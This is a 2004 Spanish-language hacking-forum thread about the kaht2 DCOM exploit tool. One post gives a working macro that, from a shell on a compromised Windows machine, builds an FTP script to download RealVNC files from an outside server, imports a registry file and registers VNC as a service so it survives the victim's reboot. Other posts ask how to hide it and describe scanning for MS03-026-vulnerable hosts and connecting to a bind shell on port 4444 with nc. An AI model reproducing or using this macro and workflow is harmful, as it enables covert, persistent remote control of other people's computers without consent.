elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 08:54  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  como se utiliza la macro del kaht2?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: como se utiliza la macro del kaht2?  (Leído 1,391 veces)
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
como se utiliza la macro del kaht2?
« en: 10 Septiembre 2004, 07:41 »

Como ejecuto la macro del kahth2

Man-In-the-Middle,
En línea
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: como se utiliza la macro del kaht2?
« Respuesta #1 en: 2 Octubre 2004, 10:28 »

Para ver la lista de macros:
Escribe: !!

Y para ejecutar una macro: !N°

Ejemplo:
Código:
[Macro]
name=REALVNC
key=!7
delay=300
cmd=cd c:\archivos de programa\
cmd=md vnc
cmd=cd vnc
cmd=echo open ftp.tusitio.com > c.txt
cmd=echo user >> c.txt
cmd=echo pass >> c.txt
cmd=echo cd carpeta_con_files >> c.txt
cmd=echo binary >> c.txt
cmd=echo get logmessages.dll >> c.txt
cmd=echo get vncconfig.exe >> c.txt
cmd=echo get winvnc4.exe >> c.txt
cmd=echo get wm_hooks.dll >> c.txt
cmd=echo get vnc.reg >> c.txt
cmd=echo bye >> c.txt
cmd=ftp -s:c.txt
cmd=del c.txt
cmd=reg import vnc.reg
cmd=start winvnc4.exe -register
cmd=start winvnc4.exe -start

Esta es una macro que hice para que descargue el RealVNC, lo registre y lo ejecute supuestamente en modo servicio.
Para ejecutar esta macro, la pegas en el archivo macros.txt y una vez en la shell, colocas: !7 y se va a ejecutar.

PD: Sigo apestado contigo... pero al escribir esto no solo te ayudo a ti, sino a todo el resto de la comunidad elhacker.net

Salu2,
En línea



W4ck1ng Team Member
Sir_Neo

Desconectado Desconectado

Mensajes: 203


$ir ||ê0


Ver Perfil WWW
Re: como se utiliza la macro del kaht2?
« Respuesta #2 en: 2 Octubre 2004, 21:14 »

gracias por tu macro, la añadire a la lista de macros.

Te agredecería si me dijeses como ocultar el vnc al completo y que la password se quede almacenada.
En línea

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: como se utiliza la macro del kaht2?
« Respuesta #3 en: 3 Octubre 2004, 05:18 »

Instalas el VNC en tu computador, colocas el puerto, la contraseña, etc...

Despues ejecutas "Regedit" y buscas el Registro del RealVNC y lo exportas a vnc.reg

Vnc.reg va a ser el registro que descargamos desde el ftp y que despues cargamos a travez de la shell (todo esta en la macro). Ademas lo registra como modo servicio, de modo que una vez que la victima reinicie el pc, se va a ejecutar como servicio de windows  ;)
En línea



W4ck1ng Team Member
Sir_Neo

Desconectado Desconectado

Mensajes: 203


$ir ||ê0


Ver Perfil WWW
Re: como se utiliza la macro del kaht2?
« Respuesta #4 en: 3 Octubre 2004, 21:30 »

Gracias chico, es lo que necesitaba.
En línea

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: como se utiliza la macro del kaht2?
« Respuesta #5 en: 5 Octubre 2004, 09:10 »

jajaja, ok, chico, creo que empezamos mal, errar es humano, perdonar divino, mis diculpas bro, si es que me las aceptas, bueno

Gracias ante todo y espero que las cosas ya esten claras
entre nosotros

 :D

Man-In-the-Middle


En línea
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: como se utiliza la macro del kaht2?
« Respuesta #6 en: 5 Octubre 2004, 12:02 »

Ningun problema. Estamos OK.

 :P
En línea



W4ck1ng Team Member
GhostShadow

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: como se utiliza la macro del kaht2?
« Respuesta #7 en: 8 Octubre 2004, 05:07 »

Bueno, la verdad que soy nuevo en este "mundillo" de exploits y llevo leyendo y leyendo posts desde hace mucho tiempo pero hasta ahora no me habia decidido a postear, ya que googleando se sacan el 99% de las dudas... Pero ahora estoy medio "trabado" con el asunto del kaht2 y/o dcom.

El asunto es que con el kaht2 por mucho que busque no logra encontrar maquinas vulnerables (exploit failed!) Por eso intente hacerlo a "mano" probe escanear con el scanms.Tras detectar varias maquinas vulnerables

"xx.xxx.xxx.xxx     [....]   [VULN]  0.0 "
"xx.xxx.xxx.xxx   [VULN] [VULN]  0.0 "

me baje el exploit MS03-026 (DCOM) e intente ejecutarlo. Tras ejecutarlo todo parecia ir bien (ambas ips tenian winxp) y me indicaba que conectara con el nc al puerto 4444 de la "victima", pero al hacerlo no lograba entrar " 

nc -vv xx.xxx.xxx.xxx 4444

[xx.xxx.xxx.xxx] 4444 (?): connection refused

Bueno, tras este ROLLO que he soltado (perdon xd) lo que queria saber basicamente es si me estoy "saltando" algun paso, ejecutando algun programa mal o si simplemente es MUY dificil encontrar maquinas REALMENTE vulnerables despues de tanto tiempo (en este caso no entiendo los resultados q devuelve el scanms =/).

Tambien pense q podria ser que las maquinas estuvieran parcheadas, pero entonces no entiendo pq me aparece [VULN]...

Bueno, gracias!! Y perdon por si este post no sigue exactamente el hilo xd

En línea
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: como se utiliza la macro del kaht2?
« Respuesta #8 en: 10 Octubre 2004, 07:05 »

Te recomiendo que escanees con la utilidad "RetinaRPCDCOM". Esa te indica realmente cuales estan infectados, y te dice cual es la version del error.
En línea



W4ck1ng Team Member
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines